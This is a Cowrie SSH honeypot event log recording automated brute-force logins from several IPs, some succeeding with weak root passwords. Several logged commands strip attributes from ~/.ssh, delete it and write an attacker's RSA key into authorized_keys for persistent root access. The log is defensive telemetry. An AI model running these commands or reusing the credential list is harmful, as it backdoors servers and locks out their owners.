{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:48:12.547101Z","src_ip":"118.26.39.178","session":"d09b0167f048"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:48:12.547943Z","src_ip":"118.26.39.178","session":"d09b0167f048"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:48:12.753255Z","src_ip":"118.26.39.178","session":"d09b0167f048"}
{"eventid":"cowrie.session.connect","src_ip":"157.20.207.165","src_port":39004,"dst_ip":"1.2.3.4","dst_port":22,"session":"af00b78775d7","protocol":"ssh","message":"New connection: 157.20.207.165:39004 (1.2.3.4:22) [session: af00b78775d7]","sensor":"my-vps","timestamp":"2025-09-09T06:48:12.867499Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:48:12.868292Z","src_ip":"157.20.207.165","session":"af00b78775d7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:48:13.052337Z","src_ip":"157.20.207.165","session":"af00b78775d7"}
{"eventid":"cowrie.login.success","username":"root","password":"123www-data","message":"login attempt [root/123www-data] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:48:13.827821Z","src_ip":"157.20.207.165","session":"af00b78775d7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:48:14.070385Z","src_ip":"118.26.39.178","session":"d09b0167f048"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T06:48:14.071095Z","src_ip":"118.26.39.178","session":"d09b0167f048"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:48:14.246207Z","src_ip":"157.20.207.165","session":"af00b78775d7"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:48:14.246917Z","src_ip":"157.20.207.165","session":"af00b78775d7"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:48:14.247913Z","src_ip":"157.20.207.165","session":"af00b78775d7"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T06:48:14.274452Z","src_ip":"118.26.39.178","session":"d09b0167f048"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:48:14.275313Z","src_ip":"118.26.39.178","session":"d09b0167f048"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:48:14.433067Z","src_ip":"157.20.207.165","session":"af00b78775d7"}
{"eventid":"cowrie.session.connect","src_ip":"118.26.39.178","src_port":48886,"dst_ip":"1.2.3.4","dst_port":22,"session":"576ae871241b","protocol":"ssh","message":"New connection: 118.26.39.178:48886 (1.2.3.4:22) [session: 576ae871241b]","sensor":"my-vps","timestamp":"2025-09-09T06:48:14.587609Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:48:14.588742Z","src_ip":"118.26.39.178","session":"576ae871241b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:48:14.818436Z","src_ip":"157.20.207.165","session":"af00b78775d7"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T06:48:14.819138Z","src_ip":"157.20.207.165","session":"af00b78775d7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:48:14.845998Z","src_ip":"118.26.39.178","session":"576ae871241b"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T06:48:15.004732Z","src_ip":"157.20.207.165","session":"af00b78775d7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:48:15.005630Z","src_ip":"157.20.207.165","session":"af00b78775d7"}
{"eventid":"cowrie.session.connect","src_ip":"157.20.207.165","src_port":39014,"dst_ip":"1.2.3.4","dst_port":22,"session":"5d8733e2ca06","protocol":"ssh","message":"New connection: 157.20.207.165:39014 (1.2.3.4:22) [session: 5d8733e2ca06]","sensor":"my-vps","timestamp":"2025-09-09T06:48:15.186308Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:48:15.187234Z","src_ip":"157.20.207.165","session":"5d8733e2ca06"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:48:15.371501Z","src_ip":"157.20.207.165","session":"5d8733e2ca06"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T06:48:15.874992Z","src_ip":"118.26.39.178","session":"576ae871241b"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T06:48:16.149490Z","src_ip":"157.20.207.165","session":"5d8733e2ca06"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:48:17.134612Z","src_ip":"118.26.39.178","session":"576ae871241b"}
{"eventid":"cowrie.session.connect","src_ip":"118.26.39.178","src_port":33074,"dst_ip":"1.2.3.4","dst_port":22,"session":"6ce31f09dac0","protocol":"ssh","message":"New connection: 118.26.39.178:33074 (1.2.3.4:22) [session: 6ce31f09dac0]","sensor":"my-vps","timestamp":"2025-09-09T06:48:17.275182Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:48:17.276045Z","src_ip":"118.26.39.178","session":"6ce31f09dac0"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:48:17.334298Z","src_ip":"157.20.207.165","session":"5d8733e2ca06"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:48:17.479446Z","src_ip":"118.26.39.178","session":"6ce31f09dac0"}
{"eventid":"cowrie.session.connect","src_ip":"157.20.207.165","src_port":39022,"dst_ip":"1.2.3.4","dst_port":22,"session":"e44949707cf6","protocol":"ssh","message":"New connection: 157.20.207.165:39022 (1.2.3.4:22) [session: e44949707cf6]","sensor":"my-vps","timestamp":"2025-09-09T06:48:17.518826Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:48:17.519528Z","src_ip":"157.20.207.165","session":"e44949707cf6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:48:17.702298Z","src_ip":"157.20.207.165","session":"e44949707cf6"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:48:18.333309Z","src_ip":"118.26.39.178","session":"6ce31f09dac0"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:48:18.475908Z","src_ip":"157.20.207.165","session":"e44949707cf6"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:48:18.536743Z","src_ip":"118.26.39.178","session":"6ce31f09dac0"}
{"eventid":"cowrie.session.closed","duration":"8.1","message":"Connection lost after 8.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:48:18.540601Z","src_ip":"118.26.39.178","session":"d09b0167f048"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:48:18.659948Z","src_ip":"157.20.207.165","session":"e44949707cf6"}
{"eventid":"cowrie.session.closed","duration":"5.8","message":"Connection lost after 5.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:48:18.661521Z","src_ip":"157.20.207.165","session":"af00b78775d7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36035,"dst_ip":"1.2.3.4","dst_port":22,"session":"d26bd2a95f80","protocol":"ssh","message":"New connection: 212.227.235.229:36035 (1.2.3.4:22) [session: d26bd2a95f80]","sensor":"my-vps","timestamp":"2025-09-09T06:48:26.324890Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:48:26.325755Z","src_ip":"212.227.235.229","session":"d26bd2a95f80"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:48:26.393193Z","src_ip":"212.227.235.229","session":"d26bd2a95f80"}
{"eventid":"cowrie.login.success","username":"root","password":"centos","message":"login attempt [root/centos] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:48:26.702386Z","src_ip":"212.227.235.229","session":"d26bd2a95f80"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:48:26.895118Z","src_ip":"212.227.235.229","session":"d26bd2a95f80"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:48:26.895804Z","src_ip":"212.227.235.229","session":"d26bd2a95f80"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:48:26.896554Z","src_ip":"212.227.235.229","session":"d26bd2a95f80"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:48:26.964153Z","src_ip":"212.227.235.229","session":"d26bd2a95f80"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:48:27.151739Z","src_ip":"212.227.235.229","session":"d26bd2a95f80"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T06:48:27.152388Z","src_ip":"212.227.235.229","session":"d26bd2a95f80"}
